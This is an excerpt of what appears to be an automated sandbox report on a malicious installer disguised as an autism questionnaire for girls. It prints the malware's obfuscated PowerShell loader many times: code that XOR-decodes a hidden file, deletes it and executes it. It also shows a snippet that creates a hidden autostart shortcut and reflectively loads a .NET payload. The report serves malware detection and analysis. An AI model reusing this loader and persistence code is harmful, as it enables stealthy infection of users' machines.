            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B5000 push 004B50DEh; ret 0_2_004B50D6
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B5980 push 004B5A48h; ret 0_2_004B5A40
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458000 push ecx; mov dword ptr [esp], ecx0_2_00458005
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049B03C push ecx; mov dword ptr [esp], edx0_2_0049B03D
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A00F8 push ecx; mov dword ptr [esp], edx0_2_004A00F9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458084 push ecx; mov dword ptr [esp], ecx0_2_00458089
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B1084 push 004B10ECh; ret 0_2_004B10E4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A1094 push ecx; mov dword ptr [esp], edx0_2_004A1095
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0041A0B4 push ecx; mov dword ptr [esp], ecx0_2_0041A0B8
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004270BC push 00427104h; ret 0_2_004270FC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458108 push ecx; mov dword ptr [esp], ecx0_2_0045810D
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004321C8 push ecx; mov dword ptr [esp], edx0_2_004321C9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A21D8 push ecx; mov dword ptr [esp], edx0_2_004A21D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049E1B8 push ecx; mov dword ptr [esp], edx0_2_0049E1B9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049A260 push 0049A378h; ret 0_2_0049A370
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00455268 push ecx; mov dword ptr [esp], ecx0_2_0045526C
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004252D4 push ecx; mov dword ptr [esp], eax0_2_004252D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004592FC push ecx; mov dword ptr [esp], edx0_2_004592FD
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0045B284 push ecx; mov dword ptr [esp], edx0_2_0045B285
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00430358 push ecx; mov dword ptr [esp], eax0_2_00430359
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00430370 push ecx; mov dword ptr [esp], eax0_2_00430371
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00459394 push ecx; mov dword ptr [esp], ecx0_2_00459398
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A1428 push ecx; mov dword ptr [esp], edx0_2_004A1429
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049B424 push ecx; mov dword ptr [esp], edx0_2_0049B425
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A24D8 push ecx; mov dword ptr [esp], edx0_2_004A24D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004224F0 push 004225F4h; ret 0_2_004225EC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004304F0 push ecx; mov dword ptr [esp], eax0_2_004304F1
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00499490 push ecx; mov dword ptr [esp], edx0_2_00499493
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458564 push ecx; mov dword ptr [esp], edx0_2_00458565
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458574 push ecx; mov dword ptr [esp], edx0_2_00458575
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00457574 push ecx; mov dword ptr [esp], ecx0_2_00457578
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: section name: .didata
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drStatic PE information: section name: .didata
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeFile created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dllJump to dropped file

            Boot Survival:

            barindex
            Powershell creates an autostart linkShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LNK');$a7741f1884746d8b943a3d6a59b94.tArgEtPath=$a6d16d7f160467a9b0e6fddfb5351+'\'+$a4a15c2242e459a842faa1e057416;$a7741f1884746d8b943a3d6a59b94.windowStylE=7;$a7741f1884746d8b943a3d6a59b94.SavE();IEX $a58b687a5fe4d2a2db88334214fab; {[ChAR]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\hVCImqdacF\asiJIvOLrmcHx.OpSwIGAQKkYgZLV');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT(

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_005C90B4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,3_2_006A68B0
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
